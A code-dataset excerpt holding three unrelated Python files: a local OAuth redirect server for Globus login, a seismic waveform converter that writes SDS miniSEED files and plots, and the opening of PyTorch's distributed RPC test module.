source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
local_server.py
|
import logging
import threading
from contextlib import contextmanager
import string
import six
from six.moves import queue
from six.moves.urllib.parse import parse_qsl, urlparse, urlunparse
try:
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
except ImportError:
from http.server import HTTPServer, BaseHTTPRequestHandler
from fair_research_login.exc import LocalServerError
from fair_research_login.code_handler import CodeHandler
log = logging.getLogger(__name__)
HTML_TEMPLATE = """
<!DOCTYPE html>
<html lang="en-US">
<head>
<meta charset="utf-8">
<meta http-equiv="x-ua-compatible" content="ie=edge">
<title>$app_name Login</title>
<style type="text/css" media="screen">
html { font: 75% "Helvetica Neue","Arial","Helvetica",sans-serif }
html, body { display: block; margin: 0; padding: 0 }
a { color: #5783a6; text-decoration: none; }
a img { border: none; }
header { background: #2e5793; }
main { padding: 25px 0 50px; }
main h1 { border-bottom: solid 1px #aaa; font-size: 233.33%;
font-weight: normal; }
main img { display: block; margin: 0 auto; max-width: 100%; height: auto; }
main p { color: #333; font-size: 116.67%; max-width: 560px;
margin: 1em auto; line-height: 150%; }
header > div, main, footer { display: block; max-width: 980px;
margin: 0 auto; }
</style>
</head>
<body>
<header><div><a href="https://www.globus.org" title="Go to Globus.org Home">
<img alt="Globus" width="215" height="64"
src="data:image/png;base64,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">
</a></div></header>
<main>
<h1>$app_name</h1>
<p>
$login_result. You may close this tab.
</p>
<p>
$error
</p>
<p>
$post_login_message
</p>
</main>
</body>
</html>
"""
DEFAULT_VARS = {
'defaults': {
'app_name': '',
'login_result': '',
'post_login_message': '',
'error': '',
},
'success': {
'login_result': 'Login Successful',
},
'error': {
'login_result': 'Login Failed',
}
}
class LocalServerCodeHandler(CodeHandler):
def __init__(self, template=None, template_vars=None,
hostname='localhost', cli_message=None):
super(LocalServerCodeHandler, self).__init__()
self._server = None
self.hostname = hostname
self.template = string.Template(template or HTML_TEMPLATE)
self.template_vars = template_vars or DEFAULT_VARS
default_message = ('Starting login with Globus Auth, '
'press ^C to cancel.')
self.cli_message = cli_message or default_message
self.no_local_server = False
def is_available(self):
local = self.is_remote_session() is False
enabled = self.no_local_server is False
log.debug('Local Server: Local: {} Enabled: {}'.format(local, enabled))
return local and enabled
def set_context(self, *args, **kwargs):
super(LocalServerCodeHandler, self).set_context(*args, **kwargs)
if not self.template_vars.get('defaults', {}).get('app_name'):
self.template_vars['defaults']['app_name'] = self.app_name
self.no_local_server = (kwargs.get('no_local_server') or
self.no_local_server)
@property
def server(self):
if self._server is None:
raise LocalServerError('server referenced before start() called!')
else:
return self._server
@contextmanager
def start(self):
self._server = RedirectHTTPServer(self.template, self.template_vars)
thread = threading.Thread(target=self.server.serve_forever)
thread.daemon = True
thread.start()
self.write_message(self.cli_message)
yield
self._server.shutdown()
del self._server
def get_redirect_uri(self):
_, port = self.server.server_address
host = '{}:{}'.format(self.hostname, port)
return urlunparse(('http', host, '', None, None, None))
def get_code(self):
return self.server.wait_for_code()
class RedirectHandler(BaseHTTPRequestHandler):
def do_GET(self): # noqa
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
query_params = dict(parse_qsl(urlparse(self.path).query))
code = query_params.get('code')
error = query_params.get('error_description',
query_params.get('error'))
resp = self.server.success() if code else self.server.error()
self.wfile.write(resp)
self.server.return_code(code or LocalServerError(error))
def log_message(self, format, *args):
return
class RedirectHTTPServer(HTTPServer, object):
DEFAULT_LISTEN = ('0.0.0.0', 0)
DEFAULT_HANDLER = RedirectHandler
VARS_KEYS = {'success', 'error'}
def __init__(self, template, vars, listen=None, handler_class=None,
timeout=3600):
HTTPServer.__init__(
self,
listen or RedirectHTTPServer.DEFAULT_LISTEN,
handler_class or RedirectHTTPServer.DEFAULT_HANDLER
)
self._auth_code_queue = queue.Queue()
self.template = template
self.vars = vars
self.timeout = timeout
if not self.VARS_KEYS.issubset(set(vars.keys())):
raise ValueError('Vars must contain two dicts: {}'
''.format(self.VARS_KEYS))
for key in self.VARS_KEYS:
self.template_test(key)
def template_test(self, key):
try:
self.render_template(key)
except KeyError as ke:
raise KeyError('"{}" template var "{}" was not provided'
''.format(key, ','.join(ke.args)))
def success(self):
return self.render_template('success')
def error(self):
return self.render_template('error')
def render_template(self, key):
tvars = self.vars.get('defaults', {})
tvars.update(self.vars[key])
return six.b(self.template.substitute(tvars))
def return_code(self, code):
self._auth_code_queue.put_nowait(code)
def wait_for_code(self):
# workaround for handling control-c interrupt.
# relevant Python issue discussing this behavior:
# https://bugs.python.org/issue1360
try:
resp = self._auth_code_queue.get(block=True, timeout=self.timeout)
if isinstance(resp, LocalServerError):
raise resp
return resp
except queue.Empty:
raise LocalServerError()
finally:
# shutdown() stops the server thread
# https://github.com/python/cpython/blob/3.7/Lib/socketserver.py#L241
self.shutdown()
# server_close() closes the socket:
# https://github.com/python/cpython/blob/3.7/Lib/socketserver.py#L474
self.server_close()
|
main.py
|
import glob
import json
import datetime
import numpy as np
import pandas as pd
import multiprocessing
import matplotlib
import os
import matplotlib.pyplot as plt
import concurrent.futures
from obspy import Stream, Trace, read, UTCDateTime
from models.sds_index import SdsIndex
from multiprocessing import Pool
matplotlib.use('Agg')
class Configuration:
'''
Membaca Konfigurasi File \n
Pastikan lokasi file config.json sudah sesuai
'''
def __init__(self, default=None, location='config.json'):
self.default = default
self.location = location
def set_location(self, location):
self.location = location
return self
def get_location(self):
return self.location
def check_directory(self, directory):
if not os.path.exists(directory):
os.makedirs(directory)
return self
def get(self):
with open(self.get_location()) as file_config:
load_config = json.load(file_config)
get_config = load_config['default']
start_date = datetime.datetime.strptime(load_config['type'][get_config]['start_date'],'%Y-%m-%d')
end_date = datetime.datetime.strptime(load_config['type'][get_config]['end_date'],'%Y-%m-%d')
output_directory = load_config['output_directory']
save_to_database = load_config['save_to_database']
cpu_used = load_config['cpu_used']
config = {
'default' : get_config,
'cpu_used': cpu_used,
'save_to_database': save_to_database,
'input_directory' : load_config['type'][get_config]['input_directory'],
'start_date' : start_date,
'end_date' : end_date,
'output_directory' : output_directory,
'index_directory' : os.path.join(output_directory, 'Index'),
'converted_directory' : os.path.join(output_directory, 'Converted'),
'dayplot_directory' : os.path.join(output_directory, 'Dayplots'),
'spectogram_directory' : os.path.join(output_directory, 'Spectogram'),
'channels' : load_config['type'][get_config]['channels'] if get_config == 'sac' else [],
'type': load_config['type']
}
self.check_directory(config['output_directory'])
self.check_directory(config['index_directory'])
self.check_directory(config['converted_directory'])
self.check_directory(config['dayplot_directory'])
self.check_directory(config['spectogram_directory'])
return config
class Files:
''' Mendapatkan semua files sesuai konfigurasi pencarian '''
def __init__(self):
self.config = Configuration().get()
def search_default(self, date):
input_directory = self.config['input_directory']
try:
stream = read(os.path.join(input_directory, date.strftime('%Y-%m-%d')+'*'))
for trace in stream:
if trace.stats.sampling_rate < 50.0:
stream.remove(trace)
stream.merge(fill_value=0)
return stream
except Exception as e:
print(e)
def search_idds(self, date):
input_directory = self.config['input_directory']
year = date.strftime('%Y')
julian_day = date.strftime('%j')
try:
stream = read(os.path.join(input_directory, year,
'VG', '*', '*', '*', '*'+julian_day+'*'))
for trace in stream:
if trace.stats.sampling_rate < 50.0:
stream.remove(trace)
stream.merge(fill_value=0)
return stream
except Exception as e:
print(e)
def search_sac(self, date):
search_list = []
stream_list = []
input_directory = self.config['input_directory']
start_date = self.config['start_date']
end_date = self.config['end_date']
channels = self.config['channels']
print('Searching files....')
for n in range(int((end_date-start_date).days)+1):
filter = start_date+datetime.timedelta(n)
for root, folders, _ in os.walk(input_directory):
for folder in folders:
if filter.strftime('%Y%m%d') in folder:
channel_folder = os.path.join(root, folder)
for channel in channels:
channel_files = [f for f in glob.glob(os.path.join(channel_folder, channel+'*'), recursive=False)]
for channel_file in channel_files:
search_list.append(channel_file)
stream_list.append(NewStream().get(search_list))
return stream_list
def search_itb(self, date):
input_directory = os.path.join(self.config['input_directory'], date.strftime('%y%m%d'))
new_stream = Stream()
for root, _, files in os.walk(input_directory):
for stream in [f for f in files if f.endswith('.mseed') or f.endswith('.sac')]:
try:
read_stream = read(os.path.join(root, stream))
for trace in read_stream:
if trace.stats.sampling_rate < 50.0:
read_stream.remove(trace)
new_stream+=read_stream
except:
print('Error : '+stream)
new_stream.merge(fill_value=0)
return new_stream
def search_win_sinabung(self, date):
year_month = date.strftime('%y%m')
year_month_day = date.strftime('%y%m%d')
input_directory = os.path.join(self.config['input_directory'], year_month, year_month_day)
print('==== Reading ALL one minute files ====')
streams = read(os.path.join(input_directory, '*','*'))
stream = streams.merge(fill_value=0)
return stream
def search_sds(self, date):
config = self.config['type']['sds']
year = date.strftime('%Y')
julian_day = date.strftime('%j')
new_stream = Stream()
for station in self.config['type']['sds']['stations']:
filename = 'VG.'+station.upper()+'.00.EHZ.D.'+year+'.'+julian_day
stream = os.path.join(self.config['input_directory'],year,'VG',station.upper(),'EHZ.D',filename)
if os.path.exists(stream):
stream = read(stream)
new_stream+=stream
return new_stream
def get(self, date, search='default'):
if search == 'default':
return self.search_default(date)
if search == 'idds':
return self.search_idds(date)
if search == 'sac':
return self.search_sac(date)
if search == 'itb':
return self.search_itb(date)
if search == 'win_sinabung':
return self.search_win_sinabung(date)
if search == 'sds':
return self.search_sds(date)
return "Konfigurasi pencarian tidak ditemukan"
def save(self, trace):
pass
class NewStream:
def __init__(self):
pass
def get(self, stream):
list_traces = []
for trace in stream:
try:
stream = read(stream)
except:
pass
else:
list_traces.append(trace)
return Stream(list_traces)
class NewTrace:
def __init__(self, config):
self.config = config
def get_channel(self, trace):
if 'Z' in trace.stats.location:
return 'EHZ'
if 'Z' in trace.stats.channel:
return 'EHZ'
if 'N' in trace.stats.channel:
return 'EHN'
if 'E' in trace.stats.channel:
return 'EHE'
if self.config['default'] == 'win_sinabung':
stations = self.config['type']['win_sinabung']['stations']
return stations[trace.stats.channel]['channel']
def get_station(self, trace):
if trace.stats.station:
return trace.stats.station
if self.config['default'] == 'win_sinabung':
stations = dict(self.config['type']['win_sinabung']['stations'])
if trace.stats.channel in stations:
return stations[trace.stats.channel]['station']
return trace.stats.channel
def get(self, trace):
trace.data = np.require(trace.data, dtype=np.int32)
trace.stats['station'] = self.get_station(trace).upper()
trace.stats['network'] = 'VG'
trace.stats['channel'] = self.get_channel(trace)
trace.stats['location'] = '00'
return trace
class Convert:
def __init__(self, location='config.json', save_to_database=False, save_to_csv=False, save_dayplot=False, save_spectogram=False):
self.save_index = save_to_database
self.save_csv = save_to_csv
self.save_dayplot = save_dayplot
self.save_spectogram = save_spectogram
self.config = Configuration(location).get()
self.search = self.config['default']
self.cpu_used = self.config['cpu_used'] if self.config['cpu_used'] < multiprocessing.cpu_count() else int(multiprocessing.cpu_count()/2)
self.index_directory = self.config['index_directory']
self.output = self.config['converted_directory']
self.dayplot_directory = self.config['dayplot_directory']
self.spectogram_directory = self.config['spectogram_directory']
def date_range(self):
start_date = self.config['start_date']
end_date = self.config['end_date']
for n in range(int((end_date-start_date).days)+1):
yield start_date+datetime.timedelta(n)
def to_mseed(self):
print('Reading configuration....')
if self.cpu_used > 1:
print('=== USE multiprocessing ===')
# threads = []
# for date in self.date_range():
# thread = threading.Thread(target=self._to_mseed, args=(date,))
# thread.start()
# threads.append(thread)
# for thread in threads:
# thread.join()
with concurrent.futures.ProcessPoolExecutor(max_workers=int(self.cpu_used)) as executor:
executor.map(self._to_mseed, self.date_range())
# with Pool(self.cpu_used) as pool:
# [pool.apply_async(self._to_mseed, (date, )) for date in self.date_range()]
# pool.map(self._to_mseed, self.date_range())
# pool.close()
# pool.join()
else:
print('USE single processing')
for date in self.date_range():
print(date)
self._to_mseed(date)
def _to_mseed(self, date):
stream = Files().get(date=date, search=self.search)
if len(stream) > 0:
self.save(stream,date)
def save(self,stream, date):
for tr in stream:
new_trace = NewTrace(self.config).get(tr)
if new_trace.stats.sampling_rate >= 50.0:
print(new_trace)
path = SDS().save(self.output,new_trace)
if self.save_index:
SaveIndex().save(path, new_trace, date, db=True)
if self.save_csv==True:
SaveIndex().save(path, new_trace, date, csv=True, index_directory=self.index_directory)
if self.save_dayplot==True:
Plot().save(trace=new_trace, save_dayplot=True, dayplot_directory=self.dayplot_directory)
if self.save_spectogram==True:
Plot().save(trace=new_trace, save_spectogram=True, spectogram_directory=self.spectogram_directory)
else:
print('Skipped '+date.strftime('%Y-%m-%d'))
print(':: '+date.strftime('%Y-%m-%d')+' DONE!!')
class SDS:
def __init__(self):
pass
def check_directory(self, directory):
if not os.path.exists(directory):
os.makedirs(directory)
return self
def file_not_exists(self, file):
return not os.path.exists(file)
def get_directory(self, output, trace):
structure = {
'year' : trace.stats.starttime.strftime('%Y'),
'julian_day' : trace.stats.starttime.strftime('%j'),
'station' : trace.stats.station,
'channel' : trace.stats.channel,
'type' : 'D',
'network': trace.stats.network,
'location': trace.stats.location
}
filename = '.'.join([
structure['network'],
structure['station'],
structure['location'],
structure['channel'],
structure['type'],
structure['year'],
structure['julian_day']
])
path = os.path.join(
'SDS',
structure['year'],
structure['network'],
structure['station'],
structure['channel']+'.'+structure['type']
)
self.check_directory(os.path.join(output,path))
full_path = os.path.join(output,path,filename)
return filename, path, full_path
def save(self, output, trace=Trace):
filename, path, full_path = self.get_directory(output, trace)
print('>> Output : '+full_path)
if self.file_not_exists(full_path):
try:
trace.write(full_path, format='MSEED', encoding='STEIM2')
except:
trace.data = trace.data.clip(-2e30, 2e30)
trace.write(full_path, format='MSEED', encoding='STEIM2')
return os.path.join(path,filename)
class SaveIndex:
def __init__(self):
pass
def get_scnl(self,trace):
scnl = trace.stats.station+'_'+trace.stats.channel+'_'+trace.stats.network+'_'+trace.stats.location
return scnl
def get_sampling_rate(self,trace):
return float(round(trace.stats.sampling_rate, 2))
def get_availability(self,trace):
availability = float(round(trace.stats.npts/(trace.stats.sampling_rate*3600*24)*100,2))
return availability
def get_filesize(self,filename):
file_mseed = os.path.join(Configuration().get()['converted_directory'], filename)
trace = read(file_mseed)[0]
return trace.stats.mseed.filesize
def save(self, filename, trace, date, db=False, csv=False, index_directory=None):
attributes = {
'scnl':self.get_scnl(trace),
'date':date,
}
values = {
'filename':filename,
'sampling_rate':self.get_sampling_rate(trace),
'max_amplitude':float(abs(trace.max())),
'availability':self.get_availability(trace),
'filesize':self.get_filesize(filename)
}
if db:
SdsIndex.update_or_create(attributes=attributes, values=values)
if csv:
df = {
'scnl' : [attributes['scnl']],
'date' : [attributes['date']],
'sampling_rate' : [values['sampling_rate']],
'max_amplitude' : [values['max_amplitude']],
'availability' : [values['availability']],
'filesize' : [values['filesize']],
}
df = pd.DataFrame(df)
file_csv = os.path.join(index_directory,attributes['scnl']+'.csv')
if not os.path.isfile(file_csv):
df.to_csv(file_csv, header=['scnl','date','sampling_rate','max_amplitude','availability','filesize'], index=False, date_format='%Y-%m-%d')
else:
df.to_csv(file_csv, mode='a', header=False, index=False, date_format='%Y-%m-%d')
class Plot:
def __init__(self):
pass
def set_time(self, trace):
date = trace.stats.starttime.strftime('%Y-%m-%d')
starttime = UTCDateTime(date+'T00:00:00.000000Z')
endtime = UTCDateTime(date+'T23:59:59.990000Z')
return starttime, endtime
def save(self, trace, save_dayplot=False, dayplot_directory=None, save_spectogram=False, spectogram_directory=None):
judul = trace.stats.starttime.strftime('%Y-%m-%d')+' | '+trace.id+' | '+str(trace.stats.sampling_rate)+' Hz | '+str(trace.stats.npts)+' samples'
if save_dayplot == True:
_, _, full_path = SDS().get_directory(dayplot_directory, trace)
trace.plot(
type='dayplot',
interval=60,
one_tick_per_line=True,
color=['k'],
outfile= '{}.png'.format(full_path),
number_of_ticks=13,
size=(1200,900),
title=judul
)
plt.close('all')
if save_spectogram == True:
_, _, full_path = SDS().get_directory(spectogram_directory, trace)
trace.spectrogram(
outfile='{}.png'.format(full_path),
title=judul,
show=False,
fmt='png'
)
plt.close('all')
def main():
print("Jumlah CPU : ", multiprocessing.cpu_count())
Convert(save_to_csv=True, save_dayplot=True, save_spectogram=False).to_mseed()
if __name__ == '__main__':
main()
|
rpc_test.py
|
import concurrent.futures
import contextlib
import json
import os
import sys
import threading
import time
from collections import namedtuple
from functools import partial
from threading import Event
from threading import Lock
from unittest import mock
import torch
import torch.nn as nn
import torch.distributed as dist
import torch.distributed.rpc as rpc
import torch.distributed.autograd as dist_autograd
from torch.distributed.rpc import RRef, _get_debug_info, _rref_context_get_debug_info, WorkerInfo
from torch.distributed.rpc.api import _delete_all_user_and_unforked_owner_rrefs, _use_rpc_pickler, _thread_local_var, _wait_all
from torch.distributed.rpc.internal import (
PythonUDF,
RPCExecMode,
_internal_rpc_pickler,
_build_rpc_profiling_key,
)
from torch.futures import Future
from torch.testing._internal.common_distributed import (
skip_if_lt_x_gpu,
captured_output,
)
from torch.testing._internal.common_utils import (
IS_MACOS,
load_tests,
sandcastle_skip_if,
get_cycles_per_ms,
)
from torch.testing._internal.dist_utils import (
dist_init,
get_function_event,
initialize_pg,
wait_until_node_failure,
wait_until_pending_futures_and_users_flushed,
wait_until_owners_and_forks_on_rank,
worker_name,
)
from torch.testing._internal.distributed.rpc.rpc_agent_test_fixture import (
RpcAgentTestFixture,
)
from torch.testing._internal.common_utils import TemporaryFileName
from torch.autograd.profiler_legacy import profile as _profile
def foo_add():
return torch.add(torch.ones(1), torch.ones(1))
def udf_with_torch_ops(device=-1, use_record_function=False):
device_ctx = contextlib.suppress() if device == -1 else torch.cuda.device(device)
record_function_ctx = (
torch.autograd.profiler.record_function("##forward##")
if use_record_function
else contextlib.suppress()
)
with device_ctx, record_function_ctx:
t1, t2 = torch.ones(1), torch.ones(1)
t = torch.add(t1, t2)
t = torch.mul(t, t)
t = t.relu()
t = t.sigmoid()
# Events (operator invocations) that are expected to be ran as part of the above
# function.
EXPECTED_REMOTE_EVENTS = [
"aten::ones",
"aten::ones",
"aten::add",
"aten::mul",
"aten::relu",
"aten::clamp_min",
"aten::sigmoid",
]
# Remote operations are prefixed with the following string for RPC profiling.
REMOTE_OP_STR = "#remote_op: "
VALUE_FUTURE = concurrent.futures.Future()
DONE_FUTURE = concurrent.futures.Future()
FIFTY_MIL_CYCLES = 50000000
_rpc_barrier_count = 0
def _increment_count():
global _rpc_barrier_count
_rpc_barrier_count += 1
def _reset_count():
global _rpc_barrier_count
_rpc_barrier_count = 0
class StubRpcAgent:
def __init__(self, world_size):
self.world_size = world_size
def get_worker_infos(self):
return {
WorkerInfo(name=worker_name(rank), id=rank)
for rank in range(self.world_size)
}
def _stub_construct_rpc_backend_options_handler(**kwargs):
return mock.Mock() # RpcBackendOptions.
def _stub_init_rpc_backend_handler(store, name, rank, world_size, rpc_backend_options):
return StubRpcAgent(world_size=world_size)
def set_value(value):
VALUE_FUTURE.set_result(value)
def wait_for_value_future():
return VALUE_FUTURE.result()
def set_and_check_done(value):
VALUE_FUTURE.set_result(value)
return DONE_FUTURE.result()
# it is used to test python user defined function over rpc
# classes and functions are used to test python user defined class and
# methods over rpc
TensorClass = namedtuple("TensorClass", ["tensors"])
class MyPickleClass:
def __init__(self):
self.t = None
def __getstate__(self):
(pickled_python_udf, tensors) = _internal_rpc_pickler.serialize(
PythonUDF(my_tensor_function, (torch.ones(2, 2), torch.ones(2, 2)), None)
)
return (pickled_python_udf, tensors)
def __setstate__(self, obj):
python_udf = _internal_rpc_pickler.deserialize(obj[0], obj[1])
result = python_udf.func(python_udf.args[0], python_udf.args[1])
self.t = result
def set(self, val):
self.t = val
class SlowPickleClass:
def __init__(self, t):
self.t = t
def __getstate__(self):
time.sleep(self.t)
return (self.t, )
def __setstate__(self, obj):
self.t = obj[0]
time.sleep(self.t)
class MyClass:
def __init__(self, a, delay=False):
self.a = a
# delay initialization to simulate errors if specified
if delay:
time.sleep(2)
def my_instance_method(self, b):
return self.a + b
@classmethod
def my_class_method(cls, d, e):
return d + e
@staticmethod
def my_static_method(f):
return f > 10
def increment_value(self, increment):
self.a += increment
